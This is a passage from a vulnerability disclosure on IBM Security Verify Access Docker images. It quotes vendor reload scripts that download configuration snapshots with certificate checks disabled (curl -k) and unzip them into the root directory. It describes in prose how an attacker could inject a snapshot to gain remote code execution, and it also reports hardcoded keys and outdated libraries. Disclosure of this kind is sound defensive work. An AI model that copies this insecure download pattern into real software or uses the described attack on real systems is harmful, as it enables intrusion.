fi\n 77 \n 78     if [ $1 -eq 1 ] ; then\n 79         Echo 960\n 80     fi\n 81 \n 82     curl -k -s --fail -u \"$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD\" \\\n 83             \"$CONFIG_SERVICE_URL/snapshots/`basename $snapshot`?type=File\" \\\n 84             -o $snapshot\n 85 \n 86     if [ $? -ne 0 ] ; then\n 87         if [ $1 -eq 1 ] ; then\n 88             Echo 961\n 89         fi\n 90 \n 91         rm -f $snapshot\n 92     else\n 93         Echo 962\n 94     fi\n 95 }\n[...]\n 97 #############################################################################\n 98 # Main line. \n 99 \n100 #\n101 # Download the snapshot file. \n102 #\n103 \n104 download_from_cfgsvc 1\n[...]\n127 #\n128 # Update the configuration database. \n129 #\n130 \n131 Echo 997\n132 \n133 db_root=/var/postgresql/config\n134 db_snapshot=$db_root/snapshot.sql\n135 db_port=5432\n136 db_name=config\n137 db_user=www-data\n138 \n139 if [ ! -f $db_snapshot ] ; then\n140     Echo 975\n141     exit 1\n142 fi\n143 \n144 psql -U $db_user -d $db_name -p $db_port -f $db_snapshot -q -b -w\n\n[/code]\n\n\n\n## Details - Remote Code Execution due to insecure reload script in verify-access-wrp\n\nIt was observed that the Docker image verify-access-wrp uses a highly insecure reload script. \n\nAn attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform. He can also overwrite any file present in the verify-access-wrp docker instance (getting a Remote Code Execution). \n\nThis script is defined at the end of the `/usr/sbin/install_system.sh` script: \n\nContent of `/usr/sbin/install_system.sh` in verify-access-wrp:\n\n[code:shell]\n210 #\n211 # Ensure that the restart script is executable. \n212 #\n213 \n214 mv /sbin/restart.sh /sbin/wrprestart\n215 \n216 chmod 755 /sbin/wrprestart\n[/code]\n\nAnalysis of `/sbin/wrprestart`:\n\nThe function `download_from_cfgsvc()` is insecure as the curl command uses the `-k` option (as known as `--insecure`) to download and install a snapshot into the instance: any invalid SSL certificate for the remote server will be accepted because of the `-k` option. \n\nThe `openldap.zip` file found in the malicious snapshot file will then be decrypted using a previously found hardcoded key and extracted into the `/` directory (line 154 and 156) and openldap will be restarted with the new configuration file, allowing an attacker to get a Remote Code Execution by specifying a malicious `slapd.conf` file (stored inside `openldap.zip`, in `etc/openldap/slapd.conf`). \n\nSince the extraction of `openldap.zip` takes place in `/`, it is also possible to overwrite any file as root (and get Remote Code Execution, e.g. by replacing a program). \n\n[code:shell]\n 85 #############################################################################\n 86 # Attempt to download the snapshot from the configuration service. \n 87 \n 88 download_from_cfgsvc()\n 89 {\n 90     # No need to download the snapshot if the configuration service has not\n 91     # been defined. \n 92     if [ -z \"$CONFIG_SERVICE_URL\" ] ; then\n 93         return\n 94     fi\n 95 \n 96     if [ $1 -eq 1 ] ; then\n 97         Echo 960\n 98     fi\n 99 \n100     curl -k -s --fail -u \"$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD\" \\\n101             \"$CONFIG_SERVICE_URL/snapshots/`basename $snapshot`?type=File\" \\\n102             -o $snapshot\n103 \n104     if [ $? -ne 0 ] ; then                                                                                                                                                                      \n105         if [ $1 -eq 1 ] ; then                                                                                                                                                                  \n106             Echo 961                                                                                                                                                                            \n107         fi\n108 \n109         rm -f $snapshot\n110     else\n111         Echo 962\n112     fi\n113 }\n[...]\n137 #############################################################################\n138 # Process the OpenLDAP configuration and then restart the OpenLDAP server. \n139 \n140 restart_openldap_server()\n141 {\n142     # Check to see whether the embedded LDAP server has been enabled or\n143     # not. \n144     ldap_conf=\"/var/PolicyDirector/etc/ldap.conf\"\n145     ldap_host=`$pdconf -f $ldap_conf getentry ldap host`\n146 \n147     if [ \"$ldap_host\" != \"127.0.0.1\" ] ; then\n148         return\n149     fi\n150 \n151     Echo 964\n152 \n153     # Decrypt and extract the LDAP configuration. \n154     isva_decrypt $snapshot_tmp_dir/openldap.zip\n155 \n156     unzip -q -o $snapshot_tmp_dir/openldap.zip -d /\n157 \n158     # Change the LDAP port from 389 to 6389 (389 is a privileged port). \n159     $pdconf -f $ldap_conf setentry ldap port 6389\n160 \n161     # Stop the LDAP server. \n162     busybox killall -SIGHUP slapd\n163 \n164     while $(busybox killall -0 slapd 2\u003e/dev/null); do\n165         sleep 1\n166     done\n167 \n168     # Start the LDAP server. \n169     slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0\n170 }\n[...]\n260 #############################################################################\n261 # Main line. \n262 \n263 #\n264 # Attempt to download the configuration data from the configuration service. \n265 #\n266 \n267 #\n268 # Wait for the snapshot file. \n269 #\n270 \n271 download_from_cfgsvc 1\n[...]\n305 #\n306 # Restart the OpenLDAP server. \n307 #\n308 \n309 restart_openldap_server\n[/code]\n\n\n\n## Details - Hardcoded private key for IBM ISS (ibmcom/verify-access)\n\nIt was observed that the ibmcom/verify-access Docker image contains a hardcoded private key used by the license client iss-lum:\n\n    kali-docker# pwd \n    /home/user/ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/lum\n    \n    kali-docker# ls -al \n    total 492 \n    drwxr-xr-x  2 root root   4096 Jun  8 01:43 . \n    drwxr-xr-x 25 root root   4096 Jun  8 04:09 .. \n    -rwxr-xr-x  1 root root   1296 Oct 20  2016 externalTrustSettings.xml\n    -rwxr-xr-x  1 root root 445080 Oct 20  2016 iss-external.kdb\n    -rwxr-xr-x  1 root root    129 Oct 20  2016 iss-external.sth\n    -rwxr-xr-x  1 root root    100 Oct 20  2016 iss-lum.conf\n    -rwxr-xr-x  1 root root   3649 Oct 20  2016 isslum-usLocalSettings.xml\n    -rwxr-xr-x  1 root root    725 Oct 20  2016 lum_triggers.conf\n    -rwxr-xr-x  1 root root   1858 Oct 20  2016 private.pem\n    -rwxr-xr-x  1 root root    451 Oct 20  2016 public.pem\n    -rwxr-xr-x  1 root root   3926 Oct 20  2016 .udrc\n    -rwxr-xr-x  1 root root    806 Oct 20  2016 update-settings.conf\n    -rwxr-xr-x  1 root root   7352 Oct 20  2016 update-status.xsd\n    -rwxr-xr-x  1 root root    561 Jun  8 01:32 UpdateTypeNames.config\n    -rwxr-xr-x  1 root root      0 Dec 31  1969 .wh..wh..opq\n\n    kali-docker# sha256sum private.pem public.pem\n    e1ecbd519ef838861cb0fe5e5daad88f90b9b2c154a936daf7f08855039b0c1d  private.pem\n    3a6bbfef0af62c277cbe7b7fbc061b6a11b01e9ff61bba7bfe7edcaaeae3cd20  public.pem\n\nWhen analyzing the podman instance verify-access, we can confirm the key has not been updated:\n\n    [isam@verify-access lum]$ sha256sum private.pem  public.pem\n    e1ecbd519ef838861cb0fe5e5daad88f90b9b2c154a936daf7f08855039b0c1d  private.pem\n    3a6bbfef0af62c277cbe7b7fbc061b6a11b01e9ff61bba7bfe7edcaaeae3cd20  public.pem\n    [isam@verify-access lum]$\n\nThe private key appears to be used by several programs:\n\n- - /opt/dca/bin/dcatool\n- - /usr/bin/isslum-modstatus\n- - /usr/sbin/iss-lum\n- - /usr/sbin/mesa_config\n- - /usr/sbin/mesa_eventsd\n- - /usr/sbin/isslum-installer\n\n\nThe license client is using outdated codes and may contain vulnerabilities. \n\nThe keys are hardcoded and have not been updated for 6 years, which brings a question how the license client is being maintained. \n\n\n\n## Details - dcatool using an outdated OpenSSL library (ibmcom/verify-access)\n\nIt was observed that the `dcatool` program located in `/opt/dca/bin` is linked with an outdated OpenSSL library located in the non-standard directory `/opt/dca/lib`:\n\n- From a live system:\n\n    [isam@verify-access bin]$ pwd\n    /opt/dca/bin\n    [isam@verify-access bin]$ ls -la\n    total 580\n    drwxr-xr-x 2 root root   4096 Jun  8 13:43 . \n    drwxr-xr-x 4 root root   4096 Jun  8 13:43 .. \n    -rwxr-xr-x 1 root root 373208 Jun  8 13:31 dcatool\n    -rwxr-xr-x 1 root root 207872 Jun  8 13:31 dcaupdate\n    [isam@verify-access bin]$ ldd dcatool  | grep ssl\n            libssl.so.10 =\u003e /opt/dca/lib/libssl.so.10 (0x00007fafcfb1e000)\n            libssl.so.1.1 =\u003e /lib64/libssl.so.1.1 (0x00007fafcda45000)\n    [isam@verify-access bin]$ ldd dcaupdate  | grep ssl\n            libssl.so.10 =\u003e /opt/dca/lib/libssl.so.10 (0x00007fe04980d000)\n            libssl.so.1.1 =\u003e /lib64/libssl.so.1.1 (0x00007fe047734000)\n\nAnalysis of the library:\n\n    [isam@verify-access lib]$ pwd\n    /opt/dca/lib\n    [isam@verify-access lib]$ ls -la\n    total 4156\n    drwxr-xr-x 2 root root    4096 Jun  8 13:43 . \n    drwxr-xr-x 4 root root    4096 Jun  8 13:43 .. \n    -rwxr-xr-x 1 root root 1252080 Jun  8 13:31 libboost_regex.so.1.53.0\n    -rwxr-xr-x 1 root root 2521496 Jun  8 13:31 libcrypto.so.10\n    lrwxrwxrwx 1 root root      24 Jun  8 13:43 libicudata.so.54 -\u003e /usr/lib64/libicudata.so\n    lrwxrwxrwx 1 root root      24 Jun  8 13:43 libicui18n.so.54 -\u003e /usr/lib64/libicui18n.so\n    lrwxrwxrwx 1 root root      22 Jun  8 13:43 libicuuc.so.54 -\u003e /usr/lib64/libicuuc.so\n    -rwxr-xr-x 1 root root  470328 Jun  8 13:31 libssl.so.10\n    [isam@verify-access lib]$ sha256sum *so*\n    a4b9594f78c0e5cfa14c171e07ae439dccd0ef990db8c4b155c68fde43a8d9a9  libboost_regex.so.1.53.0\n    8db48d5bcf1ddf6a8a4033de04827288b33af36d246c73ba46041365a61c697c  libcrypto.so.10\n    07796e84fc3618a64259cfff7a896e57fc90f6b270d690d953f4792c2b7e21ac  libicudata.so.54\n    49e6f6b12d118118c7d17cec26f80c81b39c89ea01a30eaf26abb07859d909fe  libicui18n.so.54\n    1504c73f432bc24414c0ca69d29bdb04c04ba2269b752c320306cb25aadd5972  libicuuc.so.54\n    523ad80dd3cd9afe19bbb83eb22b11ba43b0dc907a3893a38569023ef7b382f0  libssl.so.10\n    [isam@verify-access lib]$\n\nWe can retrieve these 2 libraries inside the `ibmcom/verify-access` image and identify the version of OpenSSL:\n\n    kali-docker# sha256sum **/libssl.so.10                                                                                                \n    523ad80dd3cd9afe19bbb83eb22b11ba43b0dc907a3893a38569023ef7b382f0  698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libssl.so.10\n    kali-docker# sha256sum **/libcrypto.so.10                                                                                             \n    8db48d5bcf1ddf6a8a4033de04827288b33af36d246c73ba46041365a61c697c  698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libcrypto.so.10\n    \n    kali-docker# kali-docker# strings 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libcrypto.so.10|grep -i openssl\n    [...][\n    OpenSSL 1.0.2k-fips  26 Jan 2017\n    [...]\n    kali-docker# strings 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libssl.so.10|grep -i openssl\n    OpenSSL 1.0.2k-fips  26 Jan 2017\n    [...]\n\nThe libraries located in `/opt/dca/lib` are completely outdated and are vulnerable to known CVEs. \n\nThese libraries are likely used by IBM-specific programs. \n\nThe Docker images contain known vulnerabilities. \n\n\n\n## Details - iss-lum using an outdated OpenSSL library (ibmcom/verify-access) and hardcoded keys\n\nIt was observed that the `/usr/sbin/iss-lum` program from the verify-access Docker image contains outdated OpenSSL code (from the library 0.9.7) from 2007. The iss-lum program is the license client that will connect to external servers. \n\nThis program runs inside the instance:\n\n    [isam@verify-access /]$ ps -auxw\n    USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND\n    isam           1  0.0  0.0  12060   132 ?        Ss   Oct04   0:00 /bin/sh /sbin/bootstrap.sh\n    isam         313  0.0  0.0  24532    68 ?        Ss   Oct04   0:00 /usr/sbin/mesa_crashd\n    isam         315  0.1  0.0  24532  1032 ?        S    Oct04   1:57 /usr/sbin/mesa_crashd\n    isam         319  0.0  0.0  69160   144 ?        Ss   Oct04   0:00 /usr/sbin/mesa_syslogd\n    isam         321  0.0  0.0  69224  1280 ?        S    Oct04   0:00 /usr/sbin/mesa_syslogd\n    isam         400  0.0  0.0 102760   200 ?        Ss   Oct04   0:00 /usr/sbin/mesa_eventsd -m 1000\n    isam         401  0.0  0.0 710856   316 ?        Sl   Oct04   0:00 /usr/sbin/mesa_eventsd -m 1000\n    pgresql      435  0.0  0.0 188380  7016 ?        Ss   Oct04   0:02 /usr/bin/postgres -D /var/postgresql/config/data\n    pgresql      436  0.0  0.0 138892   184 ?        Ss   Oct04   0:00 postgres: logger   \n    pgresql      447  0.0  0.0 188380  1600 ?        Ss   Oct04   0:00 postgres: checkpointer   \n    pgresql      448  0.0  0.0 188516  1288 ?        Ss   Oct04   0:01 postgres: background writer   \n    pgresql      449  0.0  0.0 188380  1468 ?        Ss   Oct04   0:01 postgres: walwriter   \n    pgresql      450  0.0  0.0 189112  1864 ?        Ss   Oct04   0:01 postgres: autovacuum launcher   \n    pgresql      451  0.0  0.0 139024   588 ?        Ss   Oct04   0:05 postgres: stats collector   \n    pgresql      452  0.0  0.0 188916  1016 ?        Ss   Oct04   0:00 postgres: logical replication launcher   \n    www-data     548  0.4  4.8 4920352 387128 ?      SLl  Oct04   7:53 /opt/java/jre/bin/java -javaagent:/opt/IBM/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.sun.jndi.ldap.object.disableEndpointIdentification=true -Djava.security.properties=/opt/IBM/wlp/usr/servers/default/java.security -Dcom.ibm.ws.logging.log.directory=/var/application.logs.local/lmi -Xbootclasspath/a:/opt/pdjrte/java/export/rgy/com.tivoli.pd.rgy.jar:/opt/ibm/wlp/usr/servers/runtime/lib/global/xercesImpl.jar -Dorg.osgi.framework.system.packages.extra=com.tivoli.pd.rgy,com.tivoli.pd.rgy.authz,com.tivoli.pd.rgy.exception,com.tivoli.pd.rgy.ldap,com.tivoli.pd.rgy.nls,com.tivoli.pd.rgy.util,com.ibm.misc,com.ibm.net.ssl.www2.protocol.https,com.sun.jndi.ldap,org.apache.xml.serialize -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 --add-exports java.base/sun.security.action=ALL-UNNAMED --add-exports java.naming/com.sun.jndi.ldap=ALL-UNNAMED --add-exports java.naming/com.sun.jndi.url.ldap=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang=ALL-UNNAMED --add-opens java.base/java.util.concurrent=ALL-UNNAMED --add-opens java.base/java.io=ALL-UNNAMED --add-opens java.naming/javax.naming.spi=ALL-UNNAMED --add-opens jdk.naming.rmi/com.sun.jndi.url.rmi=ALL-UNNAMED --add-opens java.naming/javax.naming=ALL-UNNAMED --add-opens java.rmi/java.rmi=ALL-UNNAMED --add-opens java.sql/java.sql=ALL-UNNAMED --add-opens java.management/javax.management=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED --add-opens java.desktop/java.awt.image=ALL-UNNAMED --add-opens java.base/java.security=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED -jar /opt/IBM/wlp/bin/tools/ws-server.jar default --clean\n    isam         748  0.0  0.0 270992     8 ?        Ssl  Oct04   0:02 /usr/sbin/wga_watchdogd slapdw -log_file /var/application.logs.local/verify_access_runtime/user_registry/msg__user_registry.log /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap\n    ldap         753  0.0  4.3 1314228 346548 ?      Sl   Oct04   0:00 /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap\n    isam         757  0.0  0.0 271124     8 ?        Ssl  Oct04   0:02 /usr/sbin/wga_watchdogd ISAM-Policy-Server -log_file /var/application.logs.local/verify_access_runtime/policy/msg__pdmgrd.log -cfg /var/PolicyDirector/etc/ivmgrd.conf /opt/PolicyDirector/bin/pdmgrd -foreground\n    ivmgr        762  0.0  0.1 1070184 10860 ?       Sl   Oct04   0:01 /opt/PolicyDirector/bin/pdmgrd -foreground\n    isam         805  0.0  0.0  71488   316 ?        Ss   Oct04   0:00 /usr/sbin/iss-lum\n    isam         806  0.0  0.0 343920  5264 ?        Sl   Oct04   0:00 /usr/sbin/iss-lum\n    root         811  0.0  0.0  41984  2416 ?        Ss   Oct04   0:00 /usr/sbin/crond\n    isam         834  0.0  0.0 128400  2076 ?        Ssl  Oct04   0:00 /usr/sbin/rsyslogd\n    root         859  0.0  0.0 174348    96 ?        Ss   Oct04   0:00 /usr/sbin/wga_servertaskd\n    ivmgr        861  0.0  0.0 276544    84 ?        Sl   Oct04   0:00 /usr/sbin/wga_servertaskd\n    isam         870  0.0  0.0 273920     8 ?        Ssl  Oct04   0:02 /usr/sbin/wga_watchdogd wga_notifications -log_file /var/log/wga_notifications.log wga_notifications -foreground\n    isam         877  2.1  0.2 563872 18472 ?        Sl   Oct04  38:43 wga_notifications -foreground\n    isam         889  0.0  0.0  12060    80 ?        S    Oct04   0:00 /bin/sh /sbin/bootstrap.sh\n    isam         892  0.0  0.0  23068    24 ?        S    Oct04   0:00 /usr/bin/coreutils --coreutils-prog-shebang=tail /usr/bin/tail -F -n+0 /var/application.logs.local/lmi/messages.log\n    isam      217541  4.0  0.0  19248  3836 pts/0    Ss   21:37   0:00 bash\n    isam      217564  0.0  0.0  54808  4080 pts/0    R+   21:37   0:00 ps -auxww\n    [isam@verify-access /]$ \n\nThis program appears to establish connections to remote servers to check the license. \n\nThe OpenSSL library embedded inside the program is completely outdated (0.9.7j - Feb 2007):\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nFurthermore, this program includes several hardcoded keys to decrypt the private key in `/etc/lum/private.pem`. In the function ctor_009:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nSome decryption keys have been identified within the binaries used to check the license:\n\nFunction `sub_4806C0`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nFunction `ctor_009`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe Docker images contain known vulnerabilities. \n\n\n\n## Details - Outdated \"IBM Crypto for C\" library\n\nIt was observed that the IBM Crypto for C library is installed inside all the Docker images in the directory `/usr/local/ibm/gsk8_64`:\n\nFor example, from the Docker image verify-access-wrp:\n\n    kali-docker# cd ./_verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a \n    kali-docker# find usr/local/ibm       \n    usr/local/ibm\n    usr/local/ibm/gsk8_64\n    usr/local/ibm/gsk8_64/lib64\n    usr/local/ibm/gsk8_64/lib64/libgsk8cms_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8kicc_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8p11_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8ssl_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8drld_64.so\n    usr/local/ibm/gsk8_64/lib64/C\n    usr/local/ibm/gsk8_64/lib64/C/icc\n    usr/local/ibm/gsk8_64/lib64/C/icc/icclib\n    usr/local/ibm/gsk8_64/lib64/C/icc/icclib/libicclib084.so\n    usr/local/ibm/gsk8_64/lib64/C/icc/icclib/ICCSIG.txt\n    usr/local/ibm/gsk8_64/lib64/libgsk8ldap_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8iccs_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8valn_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8acmeidup_64.so\n    usr/local/ibm/gsk8_64/lib64/N\n    usr/local/ibm/gsk8_64/lib64/N/icc\n    usr/local/ibm/gsk8_64/lib64/N/icc/icclib\n    usr/local/ibm/gsk8_64/lib64/N/icc/icclib/libicclib085.so\n    usr/local/ibm/gsk8_64/lib64/N/icc/icclib/ICCSIG.txt\n    usr/local/ibm/gsk8_64/lib64/N/icc/ReadMe.txt\n    usr/local/ibm/gsk8_64/lib64/libgsk8dbfl_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8km2_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8km_64.so\n    usr/local/ibm/gsk8_64/lib64/libgsk8sys_64.so\n    usr/local/ibm/gsk8_64/docs\n    usr/local/ibm/gsk8_64/copyright\n    usr/local/ibm/gsk8_64/inc\n    usr/local/ibm/gsk8_64/bin\n    usr/local/ibm/gsk8_64/bin/gsk8capicmd_64\n    usr/local/ibm/gsk8_64/bin/gsk8ver_64\n    usr/local/ibm/.wh..wh..opq\n    kali-docker#\n\nThis library is based on the opensource libraries zlib and OpenSSL. It was built in October 2020, as shown below:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nFurthermore, the copyrights from the `/usr/local/ibm/gsk8_64/lib64/N/icc/ReadMe.txt` file indicate:\n\n- - (C) 1995-2004 Jean-loup Gailly and Mark Adler - for zlib\n- - Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved. - for OpenSSL\n\nThe `/usr/local/ibm/gsk8_64/lib64/N/icc/icclib/ICCSIG.txt` file confirms the libraries were generated 2 years ago:\n\n    #\n    # IBM Crypto for C. \n    # ICC Version 8.7.37.0\n    #\n    # Note the signed library contains a copy of cryptographic code from OpenSSL (www.openssl.org),\n    # zlib (www.zlib.org)\n    # and IBM code (www.ibm.com)\n    #\n    # Platform AMD64_LINUX\n    #\n    # Generated Tue Oct 13 12:09:08 2020\n    #\n    # File name=libicclib085.so\n    # File Hash (SHA256)=bbbb89eae43b11aba9a132a53207ca532236cd064b6aa0b84ea878a0b9bf8b4f\n    #\n    FILE=906082662e6b3a50fc01a95f2d1bb29d3a54349ad76da59fc8555fadadae4e5305463810ece2064174129a95e89352a02d8c72c7397de2d01b38220c3222796992785b8d99401a65b0894778a2b05760ae1a6919a97e259d270ff5e6996a14fc29e48a848c59e14f2aa758e8e26355faeff60eca0562ad643a86b8fdaa6afd10190190d411a584679ff1ee93caf5039ef070d411040fc828e4b8f79b8bb67d3ec1708c8274c0c9f6899399492fa52c73574065f2684dcc336c41eee2b808b42b0a01578b32fae245b761580240e3b53359767634ba76018f46a8d732c21ec24bf1a979aa11af20b646f166d5658efabcebdf6283fbdc793d82636e89bf2ac4ad\n    #\n    SELF=10fefb48a0666936f23aceae7805a7dcefb06a9a2282fea0693610a98ccf12cab8bfef973cda13450afde785960eccb2637adaf15f5e795cdb21f667704ba30ebf6a6a077f29a3574d0792ef633172d324a5b26adc257d3380ffd1cf7698bc560fb52d5c083ffa85fe623e059f7c8d67a8043ca75d8808c082de29bb8e1c46a01421039e557699cf7747c07a22a0e1612b0e4de8836833bebc888269dc46adf0ed5ba0107da2e683554433ed29ab840d16af34581682e35a30d11ff10fbd8ba0cc7ae6a62b75c3ba4758863e5a5a4cf00371040358a732a56ecf7dd04523c85544755c6f0f42447f383ec22e0ee4d79bb3c6e6defc4319f555afaaa1cfc8642f\n    #\n    #Do not edit before this line\n    #\n    # Global Settings\n    ICC_ALLOW_2KEY3DES=1\n\nThe OpenSSL code and the zlib code are at least 2 year old and vulnerable to CVEs. \n\nThe Docker images contain known vulnerabilities. \n\n\n\n## Details - Webseald using outdated code with remotely exploitable vulnerabilities\n\nIt was observed that the webseald program borrows codes provided by open-source libraries containing outdated and vulnerable code. \nThis program can be found inside these 2 images:\n\n- - verify-access\n- - verify-access-wrp\n\nWebseald is reachable over the network. \n\nLibraries used by webseald:\n\n    kali-docker# ldd ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/opt/pdweb/bin/webseald\n            linux-vdso.so.1 (0x00007fffe59f3000)\n            libwsdaemon.so =\u003e not found\n            libamwoauth.so =\u003e not found\n            libamweb.so =\u003e not found\n            libamwebrte.so =\u003e not found\n            libpdsvcutl.so =\u003e not found\n            libtivsec_msg.so =\u003e not found\n            libpdz.so =\u003e not found\n            libdl.so.2 =\u003e /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f61885e8000)\n            libtivsec_xslt4c.so.112 =\u003e not found\n            libtivsec_xml4c.so =\u003e not found\n            libtivsec_yamlcpp.so =\u003e not found\n            libam_gssapi_krb5.so =\u003e not found\n            libmodsecurity.so.3 =\u003e not found\n            libamwredismgr.so =\u003e not found\n            libhiredis.so.0.15 =\u003e not found\n            libhiredis_ssl.so.0.15 =\u003e not found\n            libpthread.so.0 =\u003e /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f61885df000)\n            libstdc++.so.6 =\u003e /lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007f6188200000)\n            libm.so.6 =\u003e /lib/x86_64-linux-gnu/libm.so.6 (0x00007f6188504000)\n            libgcc_s.so.1 =\u003e /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007f61884e4000)\n            libc.so.6 =\u003e /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6187e00000)\n            /lib64/ld-linux-x86-64.so.2 (0x00007f6188604000)\n\nThe IBM-specific libraries (*.so*) have been analyzed only in surface to detect low-hanging fruits, and several vulnerabilities were found, including some pre-auth vulnerabilities. \n\nWebseal is directly reachable from the network but uses the outdated and vulnerable code. \n\nThe quality of the code is extremely inequal between the libraries - some code is very well implemented (with secure calls to -cpy functions) and some code is vulnerable (with insecure calls to -cpy functions). These libraries contain some legacy codes that are not up to date with the current security standards. \n\nDue to the lack of time, only a superficial analysis was done - an attacker with time will likely find 0-day vulnerabilities in these libraries. \n\n\n\n### Libmodsecurity.so - 1 non-assigned CVE vulnerability\n\nThe `/opt/pdweb/lib/libmodsecurity.so.3` library (b939c5db3ca94073188ea6eb360049f58f9e9d2a9c7d72bc052d9ee47cc5eccc) contains a vulnerable libinjection library. The version used is 3.9.2:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThis version (3.9.2) is known to have several vulnerabilities. For example, a pre-authentication DoS (https://github.com/SpiderLabs/ModSecurity/issues/1412) from 2017 (no CVE). \n\nThis version is confirmed to be vulnerable: https://github.com/client9/libinjection/issues/124. \n\n\n\n### libtivsec_yamlcpp.so - 4 CVEs\n\nThis IBM library is entirely based on yaml-cpp. Yaml-cpp is available at https://github.com/jbeder/yaml-cpp. \n\nSeveral vulnerabilities have been patched in 2020 (CVE-2017-5950, CVE-2018-20573, CVE-2018-20574 and CVE-2019-6285) in the yaml-cpp library. \n\nThis IBM-specific library is located at `/usr/lib64/libtivsec_yamlcpp.so` and `/opt/ibm/Tivoli/SecUtilities/lib/libtivsec_yamlcpp.so` (cf1b80c501a2f42948322567477c2956155e244d645e3962985569c4496ffad90). \n\nWhen doing reverse engineering on this file, it appears no security patches have been imported from the official yaml-cpp repository. \n\nWe can identify several methods from the yaml-cpp library. For example, the method `SingleDocParser::HandleFlowMap()` found in `/usr/lib64/libtivsec_yamlcpp.so` and `/opt/ibm/Tivoli/SecUtilities/lib/libtivsec_yamlcpp.so`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nWhen analyzing the security patches available at https://github.com/jbeder/yaml-cpp/pull/807 and https://github.com/jbeder/yaml-cpp/pull/807/files/dbd5ac094622ef3b3951e71c31f59e02c930dc4b, there is no reference in the compiled code regarding a `DeepRecursion` class or any method implemented in the security patches. This `DeepRecursion` class is included in the now-patched versions. \n\nThe IBM-specific library is using an outdated and vulnerable version of yaml-cpp, without security patches, e.g. 4 CVEs patched in yaml-cpp - https://github.com/jbeder/yaml-cpp/pull/807. \n\nAnalysis of the security patches implementing new classes:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nFurthermore, it is possible to analyze the rest of the security patches from the git repository and compare them with the assembly code from the `libtivsec_yamlcpp.so` library. This allows us to conclude the security patches have not been imported into the `libtivsec_yamlcpp.so` library. \n\nSource code providing security patches:\n\nMethod `HandleNode()` from the security patches and the patched versions of yaml-cpp:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nWith the assembly code extracted from the `libtivsec_yamlcpp.so` library and rebuilt into pseudo-code, we can identify the same logic and the same instructions (minus some errors due to the reconstruction from assembly to C++) - with the lack of the patch located on the line 51. \n\nPseudo-code of method `HandleNode()`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThis allows us to conclude that the `libtivsec_yamlcpp.so` library is vulnerable to these 4 CVEs. \n\n\n\n### libtivsec_xml4c.so - outdated Xerces-C library\n\nThis library (8b3d3d2dcb1152966d097e91e08fa1dc4300f3653f1c264eeecaf20bb1550832) is located in `/usr/lib64/libtivsec_xml4c.so` and `/opt/ibm/Tivoli/SecUtilities/lib/libtivsec_xml4c.so`) and uses outdated code from XML4C 5.5.0 that includes a version of Xerces-C (XML4C doesn\u0027t exist anymore and the latest release appears to be from 2007-2008). \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThis version appears to be quite outdated and is likely vulnerable to known CVEs 